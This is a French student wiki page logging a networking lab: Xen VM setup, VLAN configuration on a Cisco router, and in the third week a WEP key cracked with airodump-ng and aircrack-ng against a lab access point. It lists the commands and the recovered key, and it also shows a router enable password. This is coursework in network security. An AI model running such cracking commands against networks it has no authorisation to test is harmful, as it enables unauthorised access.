Cahier 2016 groupe n°6 : Différence entre versions
m (→Réalisation 3ème semaine) |
m (→Réalisation 3ème semaine) |
||
Ligne 130 : | Ligne 130 : | ||
Le monitoring est donc lancé, nous pouvons passer au crackage : | Le monitoring est donc lancé, nous pouvons passer au crackage : | ||
− | aircrack-ng testcarck-01.cap | + | aircrack-ng testcarck-01.cap |
+ | |||
+ | On obtient finalement la clé : | ||
+ | |||
+ | KEY FOUND! [ EE:EE:EE:EE:EE:EE:EE:EE:EE:E4:44:44:44 ] | ||
+ | Decrypted correctly: 100% |
Version du 24 octobre 2016 à 10:15
Sommaire
Cahier des charges
Présentation du travail
Répartition du travail
Séance 1 (03/10) | Connaissances du TP/ Recherche sur le routeur 3560E / Installation de la machine virtuelle |
---|---|
Séance 2 (10/10) | Création des VLAN |
Séance 3 (13/10) | Création des VLAN / Création de la machine virtuelle |
Séance 4 (24/10) | |
Séance 5 (14/11) | |
Séance 6 (21/11) | |
Séance 7 (28/11) | |
Séance 8 (12/12) |
Réalisation 1ère semaine
Pour la première séance nous nous sommes chargés d'installer la machine virtuelle Xen à l'aide de la commande :
xen-create-image --hostname=Kadoc --ip=193.48.57.166 --mirror=http://debian.polytech-lille.fr/debian/ --dist=jessie --gateway=193.48.57.172 --netmask=255.255.255.240 --dir=/usr/local/xen --passwd
Ainsi, nous obtenons ce résultat:
Installation Summary --------------------- Hostname : Kadoc Distribution : jessie MAC Address : 00:16:3E:60:01:B1 IP Address(es) : 193.48.57.166 RSA Fingerprint : cf:03:35:4e:b7:f1:d4:f5:52:a1:d7:52:63:5d:83:57 Root Password : N/A
Réalisation 2ème semaine
VLANs
Durant les deux séances de cette semaine, nous avons réalisé la configuration locale du routeur 3560E, notamment la configuration des VLANs.
Pour cela, nous avons utilisé la communication série. Lors du démarrage, nous devons le configurer :
conf t hostname Perceval enable secret pasglop
Nous passons maintenant à la configuration des VLANs:
Nous avons 11 VLANs à configurer :
- VLAN2 à VLAN11 : un pour chaque groupe
- VLAN12 : pour les machines virtuelles et donc le lien entre Cordouan et les commutateurs
- VLAN13 : pour l'interconnexion, c'est à dire le lien entre notre routeur et le routeur de l'école.
Pour la configuration, nous prendrons l'exemple du vlan 2. Tout d'abord, nous affectons aux VLANs utiles:
vlan 2 name Vlan2 exit
Une fois le nom affecté :
conf t int Vlan2 ip address 10.60.2.1 255.255.255.0 standby 1 ip 10.60.2.2 exit
Machine virtuelle
Tout d'abord, nous nous connectons sur le serveur cordouan:
ssh root@cordouan.insecserv.deule.net
Nous créons ensuite la machine avec tous les renseignements souhaités
xen-create-image --hostname=Kadoc --ip=193.48.57.172 --netmask=255.255.255.240 --gateway=193.48.57.172 --dir=/usr/local/xen --mirror=http://debian.polytech-lille.fr/debian/ --dist=jessie
Enfin on démarre la machine virtuelle
xl create /etc/xen/Kadoc.cfg
Puis nous la lançons
xl console Kadoc
Lors de cette séance, nous avons aussi réservé notre nom de domaine sur Gandi : hamtaro.space
Nous avons également modifier le fichier de configuration de la VM en modifiant le fichier "/etc/xen/Kadoc.cfg" pour la taille mémoire 'de 128 à 512MB" ainsi que pour ajouter le bridge IMA5sc.
Réalisation 3ème semaine
Lors de cette séance : crackage clé WEP :
1ere commande : airodump-ng --encrypt wep wlan2
BSSID PWR Beacons #data #/s CH MB ENC CIPHER AUTH ESSID 04:DA:D2:9C:50:56 -57 1 65 32 2 54e. WEP WEP cracotte07
La cible que nous avons choisie est "cracotte07", donc on utilise la commande suivante :
airodump-ng --essid cracotte07 --channel 2 -w testcrack wlan2
CH 2 ][ Elapsed: 3 mins ][ 2014-12-12 18:15
BSSID PWR RXQ Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID
04:DA:D2:9C:50:56 -55 6 505 9516 231 2 54e. WEP WEP cracotte07
Le monitoring est donc lancé, nous pouvons passer au crackage :
aircrack-ng testcarck-01.cap
On obtient finalement la clé :
KEY FOUND! [ EE:EE:EE:EE:EE:EE:EE:EE:EE:E4:44:44:44 ]
Decrypted correctly: 100%